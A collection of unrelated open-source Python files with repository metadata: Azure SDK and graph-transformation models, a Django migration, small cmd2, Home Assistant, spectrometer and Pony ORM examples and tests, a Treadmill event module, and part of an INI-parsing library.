'connection_type': {'key': 'properties.connectionType', 'type': 'str'},
'routing_weight': {'key': 'properties.routingWeight', 'type': 'int'},
'shared_key': {'key': 'properties.sharedKey', 'type': 'str'},
'connection_status': {'key': 'properties.connectionStatus', 'type': 'str'},
'tunnel_connection_status': {'key': 'properties.tunnelConnectionStatus', 'type': '[TunnelConnectionHealth]'},
'egress_bytes_transferred': {'key': 'properties.egressBytesTransferred', 'type': 'long'},
'ingress_bytes_transferred': {'key': 'properties.ingressBytesTransferred', 'type': 'long'},
'peer': {'key': 'properties.peer', 'type': 'SubResource'},
'enable_bgp': {'key': 'properties.enableBgp', 'type': 'bool'},
'resource_guid': {'key': 'properties.resourceGuid', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, virtual_network_gateway1, connection_type, id=None, location=None, tags=None, authorization_key=None, virtual_network_gateway2=None, local_network_gateway2=None, routing_weight=None, shared_key=None, peer=None, enable_bgp=None, resource_guid=None, etag=None):
super(VirtualNetworkGatewayConnection, self).__init__(id=id, location=location, tags=tags)
self.authorization_key = authorization_key
self.virtual_network_gateway1 = virtual_network_gateway1
self.virtual_network_gateway2 = virtual_network_gateway2
self.local_network_gateway2 = local_network_gateway2
self.connection_type = connection_type
self.routing_weight = routing_weight
self.shared_key = shared_key
self.connection_status = None
self.tunnel_connection_status = None
self.egress_bytes_transferred = None
self.ingress_bytes_transferred = None
self.peer = peer
self.enable_bgp = enable_bgp
self.resource_guid = resource_guid
self.provisioning_state = None
self.etag = etag
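# Illustrative sketch, not part of the generated SDK code: only the first
# gateway and the connection type are required; the remaining keyword
# arguments are optional. The gateway objects and shared key below are
# placeholders, not real resources.
def _example_connection(gateway1, local_gateway):
    return VirtualNetworkGatewayConnection(
        virtual_network_gateway1=gateway1,
        local_network_gateway2=local_gateway,
        connection_type='IPsec',
        shared_key='placeholder-shared-key',
        routing_weight=10)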
| {
"content_hash": "189d04234b114c499de5a9e9b3e876e4",
"timestamp": "",
"source": "github",
"line_count": 125,
"max_line_length": 282,
"avg_line_length": 49.8,
"alnum_prop": 0.6729317269076305,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "eafc299d245401ac96e46e4ab7b9e6dbe3980592",
"size": "6699",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-mgmt-network/azure/mgmt/network/v2016_09_01/models/virtual_network_gateway_connection.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
} |
from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HSS1_if_ConnectedLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HSS1_if_ConnectedLHS.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HSS1_if_ConnectedLHS, self).__init__(name='HSS1_if_ConnectedLHS', num_nodes=0, edges=[])
# Set the graph attributes
self["mm__"] = ['MT_pre__FamiliesToPersonsMM', 'MoTifRule']
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'SS1_if')
# Set the node attributes
# Nodes that represent the edges of the property.
# Add the edges
self.add_edges([
])
# Add the attribute equations
self["equations"] = []
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
| {
"content_hash": "f1a3dd39ecdb670ff3d339c15e1b1bd6",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 125,
"avg_line_length": 43.19672131147541,
"alnum_prop": 0.4713472485768501,
"repo_name": "levilucio/SyVOLT",
"id": "cbebf0b1beeed3802405548d555d5c18204f4c10",
"size": "2635",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "UMLRT2Kiltera_MM/Properties/from_thesis/HSS1_if_ConnectedLHS.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "166159"
},
{
"name": "Python",
"bytes": "34207588"
},
{
"name": "Shell",
"bytes": "1118"
}
],
"symlink_target": ""
} |
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Event'
db.create_table(u'events_event', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('who', self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['auth.User'], null=True)),
('recorded_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('when', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('category', self.gf('django.db.models.fields.CharField')(max_length=64, null=True, blank=True)),
('action', self.gf('django.db.models.fields.CharField')(max_length=64, null=True, blank=True)),
('label', self.gf('django.db.models.fields.CharField')(max_length=64, null=True, blank=True)),
('what', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
))
db.send_create_signal(u'events', ['Event'])
def backwards(self, orm):
# Deleting model 'Event'
db.delete_table(u'events_event')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'events.event': {
'Meta': {'object_name': 'Event'},
'action': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'category': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'recorded_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'what': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'when': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'who': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': u"orm['auth.User']", 'null': 'True'})
}
}
complete_apps = ['events'] | {
"content_hash": "82a8d1e3d71a13fbd044e274d2242a4c",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 187,
"avg_line_length": 68.69620253164557,
"alnum_prop": 0.5638474295190713,
"repo_name": "alexlovelltroy/django-telemetry",
"id": "0f3cec9a3d60644f1b42857873b22d073374c28e",
"size": "5451",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "telemetry/events/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1541"
},
{
"name": "JavaScript",
"bytes": "127353"
},
{
"name": "Python",
"bytes": "22488"
}
],
"symlink_target": ""
} |
"""A sample application for cmd2 that explores a GNU Readline bug related to ANSI color escape codes.
"""
import colorama
from colorama import Fore
from cmd2 import Cmd, make_option, options
class CmdLineApp(Cmd):
""" Example cmd2 application. """
def __init__(self):
# Set use_ipython to True to enable the "ipy" command for entering an embedded IPython shell
Cmd.__init__(self)
self.prompt = '(cmd2) ' + Fore.CYAN + '1' + Fore.RESET + '> '
if __name__ == '__main__':
colorama.init(autoreset=True)
c = CmdLineApp()
c.cmdloop()
| {
"content_hash": "36e5d962d16795ab1c498f6ad66129d3",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 101,
"avg_line_length": 28.85,
"alnum_prop": 0.6447140381282496,
"repo_name": "tleonhardt/CodingPlayground",
"id": "1fe9a9f574d6b1e20b9dbc6cc02911492a1836ca",
"size": "615",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/cmd2/ColorPrompt.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "30533"
},
{
"name": "C++",
"bytes": "2514"
},
{
"name": "CMake",
"bytes": "3607"
},
{
"name": "Cython",
"bytes": "3972"
},
{
"name": "HTML",
"bytes": "1700"
},
{
"name": "Jupyter Notebook",
"bytes": "2056095"
},
{
"name": "Makefile",
"bytes": "161"
},
{
"name": "Python",
"bytes": "244507"
},
{
"name": "Ruby",
"bytes": "296"
},
{
"name": "SWIG",
"bytes": "1120"
},
{
"name": "Shell",
"bytes": "893"
}
],
"symlink_target": ""
} |
"""Support for the light on the Sisyphus Kinetic Art Table."""
import logging
import aiohttp
from homeassistant.components.light import SUPPORT_BRIGHTNESS, Light
from homeassistant.const import CONF_HOST
from homeassistant.exceptions import PlatformNotReady
from . import DATA_SISYPHUS
_LOGGER = logging.getLogger(__name__)
SUPPORTED_FEATURES = SUPPORT_BRIGHTNESS
async def async_setup_platform(hass, config, add_entities,
discovery_info=None):
"""Set up a single Sisyphus table."""
host = discovery_info[CONF_HOST]
try:
table_holder = hass.data[DATA_SISYPHUS][host]
table = await table_holder.get_table()
except aiohttp.ClientError:
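        # raising PlatformNotReady asks Home Assistant to retry this setup later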
raise PlatformNotReady()
add_entities(
[SisyphusLight(table_holder.name, table)],
update_before_add=True)
class SisyphusLight(Light):
"""Representation of a Sisyphus table as a light."""
def __init__(self, name, table):
"""Initialize the Sisyphus table."""
self._name = name
self._table = table
async def async_added_to_hass(self):
"""Add listeners after this object has been initialized."""
self._table.add_listener(
lambda: self.async_schedule_update_ha_state(False))
@property
def available(self):
"""Return true if the table is responding to heartbeats."""
return self._table.is_connected
@property
def unique_id(self):
"""Return the UUID of the table."""
return self._table.id
@property
def name(self):
"""Return the ame of the table."""
return self._name
@property
def is_on(self):
"""Return True if the table is on."""
return not self._table.is_sleeping
@property
def brightness(self):
"""Return the current brightness of the table's ring light."""
return self._table.brightness * 255
@property
def supported_features(self):
"""Return the features supported by the table; i.e. brightness."""
return SUPPORTED_FEATURES
async def async_turn_off(self, **kwargs):
"""Put the table to sleep."""
await self._table.sleep()
_LOGGER.debug("Sisyphus table %s: sleep")
async def async_turn_on(self, **kwargs):
"""Wake up the table if necessary, optionally changes brightness."""
if not self.is_on:
await self._table.wakeup()
_LOGGER.debug("Sisyphus table %s: wakeup")
if "brightness" in kwargs:
await self._table.set_brightness(kwargs["brightness"] / 255.0)
| {
"content_hash": "579fb4992e2eb100ca5534dcd23a3b7a",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 76,
"avg_line_length": 29.885057471264368,
"alnum_prop": 0.6342307692307693,
"repo_name": "jabesq/home-assistant",
"id": "9ad36df6118e551a6047710b5e8abc3a8be89985",
"size": "2600",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/sisyphus/light.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1175"
},
{
"name": "Dockerfile",
"bytes": "1829"
},
{
"name": "Python",
"bytes": "16238292"
},
{
"name": "Ruby",
"bytes": "745"
},
{
"name": "Shell",
"bytes": "17615"
}
],
"symlink_target": ""
} |
"""
Script to acquire spectra from an OceanOptics spectrometer over time
Things to modify before use:
- gid and uid of current user
"""
from __future__ import print_function
from builtins import str
from builtins import range
import sys, os
base_dir = os.path.dirname(os.path.realpath(__file__))
root_dir = os.path.abspath(os.path.join(base_dir, "..", "..", "helpers"))
sys.path.insert(0, root_dir)
from getSpectra import Icecube
from time import sleep
import argparse
import os
import time
import numpy as np
import pwd
import grp
import datetime
def main(n, description, intTime, interval):
c = 0
foldername = "{}_Group".format(time.strftime("%Y%m%d_%H%M%S"))
uid = pwd.getpwnam("sunyudong").pw_uid
gid = grp.getgrnam("sunyudong").gr_gid
# Sanity checking of inputs
if interval < intTime:
raise ValueError(f"interval = {interval}; intTime = {intTime}; Interval timing should be more than intTime.")
if n < 1:
raise ValueError(f"n = {n}; n must be at least 1.")
os.mkdir(foldername)
path = foldername
os.chown(path, uid, gid)
with open("{}/meta.info".format(foldername), 'w') as f:
meta = "{}\tintTime = {} ms\tInterval = {}ms\t{}\n".format(foldername, intTime, interval, description)
f.write(meta)
print(meta)
os.chown("{}/meta.info".format(foldername), uid, gid)
with Icecube() as cube:
# Write model information into meta.info
with open("{}/meta.info".format(foldername), 'a') as f:
f.write("Serial ({}) = {}\n".format(cube.type, cube.getSerial()))
f.write("Autonulling Factor = {}".format(cube.autonulling))
# Write some metadata about corrections
with open("{}/linearity.corr".format(foldername), 'a') as f:
f.write("Linearity Correction -> {}th Order Polynomial\n".format(cube.getSingleEEPROM(14)))
for i in range(6, 14):
f.write("{}\t{}\n".format(i - 6, cube.getSingleEEPROM(i)))
os.chown("{}/linearity.corr".format(foldername), uid, gid)
with open("{}/wavelength.corr".format(foldername), 'a') as f:
f.write("Wavelength Correction\n")
for i in range(1, 5):
f.write("{}\t{}\n".format(i - 1, cube.getSingleEEPROM(i)))
os.chown("{}/wavelength.corr".format(foldername), uid, gid)
cube.setIntegrationTime(intTime)
totalSet = False
delta = datetime.timedelta(milliseconds = interval)
while True:
try:
if n == 0:
print("\nAcquisition Complete")
break
if not totalSet:
count = 0
total = n
digits = int(np.floor(np.log10(total)) + 1)
# http://www.kahfei.com/2011/03/11/print-without-newline-in-python/
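                    # \033[K clears to the end of the line and \r returns the
                    # cursor, so each status update overwrites the previous one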
printString = "[{:>10} degC] Acquiring [{:>"+ str(digits) +"}/{}] Left: {}\033[K\r"
totalSet = True
now = datetime.datetime.now()
if n == total or now >= prevStart + delta:
count += 1
# print(printString)
print(printString.format(str(cube.getTemp()), count, total, n - 1), end=' ')
prevStart = datetime.datetime.now()
spec = cube.getSpectra()
with open("{}/data_{}".format(foldername, n) , 'w') as f:
f.write("# {}".format(prevStart))
for i in spec:
f.write("{}\t{}\n".format(i[0], i[1]))
os.chown("{}/data_{}".format(foldername,n), uid, gid)
n -= 1
except KeyboardInterrupt:
cube.releaseInterface(0)
cube.close()
print("\n --- EXITING --- ")
sys.exit()
def init():
parser = argparse.ArgumentParser()
parser.add_argument('n', type = int, help = "no. of readings to take. Positive integers only")
parser.add_argument('-d', '--description', type = str, help = "label each acquisition", default = None)
parser.add_argument('-t', '--intTime', type = float, help = "milliseconds of integration time", default = 2)
parser.add_argument('-i', '--interval', type = float, help = "Interval in milliseconds between start of acquisitions. Must be more than integration time.", default = 2)
args = parser.parse_args()
main(args.n, args.description, args.intTime, args.interval)
init()
| {
"content_hash": "78f5f4acb5b21d3da280145ebfa94ff4",
"timestamp": "",
"source": "github",
"line_count": 118,
"max_line_length": 172,
"avg_line_length": 38.55084745762712,
"alnum_prop": 0.5647395031875138,
"repo_name": "sunjerry019/photonLauncher",
"id": "e3a311c6637a4a2c5cb439c4a14b23301b32b433",
"size": "4573",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oceanoptics/get/intervalSpec.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "199131"
},
{
"name": "C++",
"bytes": "58658"
},
{
"name": "Gnuplot",
"bytes": "1621"
},
{
"name": "HTML",
"bytes": "10384"
},
{
"name": "Makefile",
"bytes": "140"
},
{
"name": "Python",
"bytes": "496455"
},
{
"name": "QMake",
"bytes": "5322"
},
{
"name": "Shell",
"bytes": "8049"
},
{
"name": "Tcl",
"bytes": "104446"
},
{
"name": "TeX",
"bytes": "20115"
}
],
"symlink_target": ""
} |
import sys, unittest
from decimal import Decimal
from datetime import date
from pony.orm import *
from pony.orm.tests.testutils import *
db = Database('sqlite', ':memory:')
class Student(db.Entity):
name = Required(str)
scholarship = Optional(int)
gpa = Optional(Decimal, 3, 1)
dob = Optional(date)
group = Required('Group')
courses = Set('Course')
biography = Optional(LongStr)
class Group(db.Entity):
number = PrimaryKey(int)
major = Required(str)
students = Set(Student)
class Course(db.Entity):
name = Required(str, unique=True)
students = Set(Student)
db.generate_mapping(create_tables=True)
with db_session:
g1 = Group(number=1, major='Math')
    g2 = Group(number=2, major='Computer Science')
c1 = Course(name='Math')
c2 = Course(name='Physics')
c3 = Course(name='Computer Science')
Student(id=1, name='S1', group=g1, gpa=3.1, courses=[c1, c2], biography='some text')
Student(id=2, name='S2', group=g1, gpa=3.2, scholarship=100, dob=date(2000, 1, 1))
Student(id=3, name='S3', group=g1, gpa=3.3, scholarship=200, dob=date(2001, 1, 2), courses=[c2, c3])
class TestPrefetching(unittest.TestCase):
def test_1(self):
with db_session:
s1 = Student.select().first()
g = s1.group
self.assertEqual(g.major, 'Math')
@raises_exception(DatabaseSessionIsOver, 'Cannot load attribute Group[1].major: the database session is over')
def test_2(self):
with db_session:
s1 = Student.select().first()
g = s1.group
g.major
def test_3(self):
with db_session:
s1 = Student.select().prefetch(Group).first()
g = s1.group
self.assertEqual(g.major, 'Math')
def test_4(self):
with db_session:
s1 = Student.select().prefetch(Student.group).first()
g = s1.group
self.assertEqual(g.major, 'Math')
@raises_exception(TypeError, 'Argument of prefetch() query method must be entity class or attribute. Got: 111')
def test_5(self):
with db_session:
Student.select().prefetch(111)
@raises_exception(DatabaseSessionIsOver, 'Cannot load attribute Group[1].major: the database session is over')
def test_6(self):
with db_session:
name, group = select((s.name, s.group) for s in Student).first()
group.major
def test_7(self):
with db_session:
name, group = select((s.name, s.group) for s in Student).prefetch(Group).first()
self.assertEqual(group.major, 'Math')
@raises_exception(DatabaseSessionIsOver, 'Cannot load collection Student[1].courses: the database session is over')
def test_8(self):
with db_session:
s1 = Student.select().first()
set(s1.courses)
@raises_exception(DatabaseSessionIsOver, 'Cannot load collection Student[1].courses: the database session is over')
def test_9(self):
with db_session:
s1 = Student.select().prefetch(Course).first()
set(s1.courses)
def test_10(self):
with db_session:
s1 = Student.select().prefetch(Student.courses).first()
self.assertEqual(set(s1.courses.name), set(['Math', 'Physics']))
@raises_exception(DatabaseSessionIsOver, 'Cannot load attribute Student[1].biography: the database session is over')
def test_11(self):
with db_session:
s1 = Student.select().prefetch(Course).first()
s1.biography
def test_12(self):
with db_session:
s1 = Student.select().prefetch(Student.biography).first()
self.assertEqual(s1.biography, 'some text')
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "e0492197667dac9c61e3fe57c2dde6a4",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 120,
"avg_line_length": 34.72072072072072,
"alnum_prop": 0.6097560975609756,
"repo_name": "compiteing/flask-ponypermission",
"id": "e33f3c97f1fa070dc345be4fdbe795f1f4a3154b",
"size": "3854",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "venv/lib/python2.7/site-packages/pony/orm/tests/test_prefetching.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5939"
},
{
"name": "CSS",
"bytes": "6267"
},
{
"name": "HTML",
"bytes": "1793"
},
{
"name": "JavaScript",
"bytes": "6187"
},
{
"name": "Python",
"bytes": "4130219"
},
{
"name": "Shell",
"bytes": "3783"
}
],
"symlink_target": ""
} |
"""Process application events."""
from __future__ import absolute_import
import tempfile
import logging
import os
import time
import kazoo.client
import yaml
from . import exc
from . import idirwatch
from . import sysinfo
from . import zkutils
from . import zknamespace as z
_LOGGER = logging.getLogger(__name__)
_SERVERS_ACL = zkutils.make_role_acl('servers', 'rwcd')
_HOSTNAME = sysinfo.hostname()
def post(events_dir, appname, event, message, payload=None):
"""Post application event to event directory."""
_LOGGER.debug('post: %s, %s, %s, %s', events_dir, appname, event, message)
with tempfile.NamedTemporaryFile(dir=events_dir,
delete=False,
prefix='.tmp') as temp:
if isinstance(payload, str):
temp.write(payload)
else:
temp.write(yaml.dump(payload))
if message is None:
message = ''
if str(message).find('\n') != -1:
_LOGGER.error('Invalid payload: %s', message)
return
filename = '%s,%s,%s,%s' % (time.time(), appname, event, message)
os.rename(temp.name, os.path.join(events_dir, filename))
class AppEventsWatcher(object):
"""Publish app events from the queue."""
def __init__(self, zkclient, events_dir):
self.zkclient = zkclient
self.events_dir = events_dir
def run(self):
"""Monitores events directory and publish events."""
watch = idirwatch.DirWatcher(self.events_dir)
watch.on_created = self._on_created
for eventfile in os.listdir(self.events_dir):
filename = os.path.join(self.events_dir, eventfile)
self._on_created(filename)
while True:
if watch.wait_for_events(60):
watch.process_events()
@exc.exit_on_unhandled
def _on_created(self, path):
"""This is the handler function when new files are seen"""
if not os.path.exists(path):
return
localpath = os.path.basename(path)
if localpath.startswith('.'):
return
_LOGGER.info('New event file - %r', path)
        eventtime, appname, event, data = localpath.split(',', 3)
with open(path) as f:
eventnode = '%s,%s,%s,%s' % (eventtime, _HOSTNAME, event, data)
_LOGGER.debug('Creating %s', z.path.task(appname, eventnode))
try:
zkutils.with_retry(self.zkclient.create,
z.path.task(appname, eventnode),
f.read(),
acl=[_SERVERS_ACL],
makepath=True)
except kazoo.client.NodeExistsError:
pass
if event in ['aborted', 'killed', 'finished']:
scheduled_node = z.path.scheduled(appname)
_LOGGER.info('Unscheduling, event=%s: %s', event, scheduled_node)
zkutils.with_retry(zkutils.ensure_deleted, self.zkclient,
scheduled_node)
os.unlink(path)
| {
"content_hash": "b3388428ee63953335dca114cb00b034",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 78,
"avg_line_length": 31.21212121212121,
"alnum_prop": 0.5673139158576052,
"repo_name": "toenuff/treadmill",
"id": "d8a758f40dbb7bdabe760b020d86c4a2b2db4d87",
"size": "3090",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/python/treadmill/appevents.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Prolog",
"bytes": "19323"
},
{
"name": "Python",
"bytes": "1511919"
},
{
"name": "Shell",
"bytes": "29014"
}
],
"symlink_target": ""
} |
"""Access and/or modify INI files
* Compatible with ConfigParser
* Preserves order of sections & options
* Preserves comments/blank lines/etc
* More convenient access to data
Example:
>>> from StringIO import StringIO
>>> sio = StringIO('''# configure foo-application
... [foo]
... bar1 = qualia
... bar2 = 1977
... [foo-ext]
... special = 1''')
>>> cfg = INIConfig(sio)
>>> print cfg.foo.bar1
qualia
>>> print cfg['foo-ext'].special
1
>>> cfg.foo.newopt = 'hi!'
>>> print cfg
# configure foo-application
[foo]
bar1 = qualia
bar2 = 1977
newopt = hi!
[foo-ext]
special = 1
"""
# An ini parser that supports ordered sections/options
# Also supports updates, while preserving structure
# Backward-compatible with ConfigParser
try:
set
except NameError:
from sets import Set as set
import re
from ConfigParser import DEFAULTSECT, ParsingError, MissingSectionHeaderError
import config
class LineType(object):
line = None
def __init__(self, line=None):
if line is not None:
self.line = line.strip('\n')
# Return the original line for unmodified objects
# Otherwise construct using the current attribute values
def __str__(self):
if self.line is not None:
return self.line
else:
return self.to_string()
# If an attribute is modified after initialization
# set line to None since it is no longer accurate.
def __setattr__(self, name, value):
if hasattr(self,name):
self.__dict__['line'] = None
self.__dict__[name] = value
def to_string(self):
raise Exception('This method must be overridden in derived classes')
class SectionLine(LineType):
regex = re.compile(r'^\['
r'(?P<name>[^]]+)'
r'\]\s*'
r'((?P<csep>;|#)(?P<comment>.*))?$')
def __init__(self, name, comment=None, comment_separator=None,
comment_offset=-1, line=None):
super(SectionLine, self).__init__(line)
self.name = name
self.comment = comment
self.comment_separator = comment_separator
self.comment_offset = comment_offset
def to_string(self):
out = '[' + self.name + ']'
if self.comment is not None:
# try to preserve indentation of comments
out = (out+' ').ljust(self.comment_offset)
out = out + self.comment_separator + self.comment
return out
def parse(cls, line):
m = cls.regex.match(line.rstrip())
if m is None:
return None
return cls(m.group('name'), m.group('comment'),
m.group('csep'), m.start('csep'),
line)
parse = classmethod(parse)
class OptionLine(LineType):
def __init__(self, name, value, separator=' = ', comment=None,
comment_separator=None, comment_offset=-1, line=None):
super(OptionLine, self).__init__(line)
self.name = name
self.value = value
self.separator = separator
self.comment = comment
self.comment_separator = comment_separator
self.comment_offset = comment_offset
def to_string(self):
out = '%s%s%s' % (self.name, self.separator, self.value)
if self.comment is not None:
# try to preserve indentation of comments
out = (out+' ').ljust(self.comment_offset)
out = out + self.comment_separator + self.comment
return out
regex = re.compile(r'^(?P<name>[^:=\s[][^:=]*)'
r'(?P<sep>[:=]\s*)'
r'(?P<value>.*)$')
def parse(cls, line):
m = cls.regex.match(line.rstrip())
if m is None:
return None
name = m.group('name').rstrip()
value = m.group('value')
sep = m.group('name')[len(name):] + m.group('sep')
# comments are not detected in the regex because
# ensuring total compatibility with ConfigParser
# requires that:
# option = value ;comment // value=='value'
# option = value;1 ;comment // value=='value;1 ;comment'
#
# Doing this in a regex would be complicated. I
# think this is a bug. The whole issue of how to
# include ';' in the value needs to be addressed.
# Also, '#' doesn't mark comments in options...
coff = value.find(';')
if coff != -1 and value[coff-1].isspace():
comment = value[coff+1:]
csep = value[coff]
value = value[:coff].rstrip()
coff = m.start('value') + coff
else:
comment = None
csep = None
coff = -1
return cls(name, value, sep, comment, csep, coff, line)
parse = classmethod(parse)
class CommentLine(LineType):
regex = re.compile(r'^(?P<csep>[;#]|[rR][eE][mM])'
r'(?P<comment>.*)$')
def __init__(self, comment='', separator='#', line=None):
super(CommentLine, self).__init__(line)
self.comment = comment
self.separator = separator
def to_string(self):
return self.separator + self.comment
def parse(cls, line):
m = cls.regex.match(line.rstrip())
if m is None:
return None
return cls(m.group('comment'), m.group('csep'), line)
parse = classmethod(parse)
class EmptyLine(LineType):
# could make this a singleton
def to_string(self):
return ''
value = property(lambda _: '')
def parse(cls, line):
if line.strip(): return None
return cls(line)
parse = classmethod(parse)
class ContinuationLine(LineType):
regex = re.compile(r'^\s+(?P<value>.*)$')
def __init__(self, value, value_offset=None, line=None):
super(ContinuationLine, self).__init__(line)
self.value = value
if value_offset is None:
value_offset = 8
self.value_offset = value_offset
def to_string(self):
return ' '*self.value_offset + self.value
def parse(cls, line):
m = cls.regex.match(line.rstrip())
if m is None:
return None
return cls(m.group('value'), m.start('value'), line)
parse = classmethod(parse)
class LineContainer(object):
def __init__(self, d=None):
self.contents = []
self.orgvalue = None
if d:
if isinstance(d, list): self.extend(d)
else: self.add(d)
def add(self, x):
self.contents.append(x)
def extend(self, x):
for i in x: self.add(i)
def get_name(self):
return self.contents[0].name
def set_name(self, data):
self.contents[0].name = data
def get_value(self):
if self.orgvalue is not None:
return self.orgvalue
elif len(self.contents) == 1:
return self.contents[0].value
else:
return '\n'.join([('%s' % x.value) for x in self.contents
if not isinstance(x, CommentLine)])
def set_value(self, data):
self.orgvalue = data
lines = ('%s' % data).split('\n')
# If there is an existing ContinuationLine, use its offset
value_offset = None
for v in self.contents:
if isinstance(v, ContinuationLine):
value_offset = v.value_offset
break
# Rebuild contents list, preserving initial OptionLine
self.contents = self.contents[0:1]
self.contents[0].value = lines[0]
del lines[0]
for line in lines:
if line.strip():
self.add(ContinuationLine(line, value_offset))
else:
self.add(EmptyLine())
name = property(get_name, set_name)
value = property(get_value, set_value)
def __str__(self):
s = [x.__str__() for x in self.contents]
return '\n'.join(s)
def finditer(self, key):
for x in self.contents[::-1]:
if hasattr(x, 'name') and x.name==key:
yield x
def find(self, key):
for x in self.finditer(key):
return x
raise KeyError(key)
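# Helper that builds a property for attribute <myattrname>: reads and writes go
# to "<myattrname>value" on this object unless a "<myattrname>source" object is
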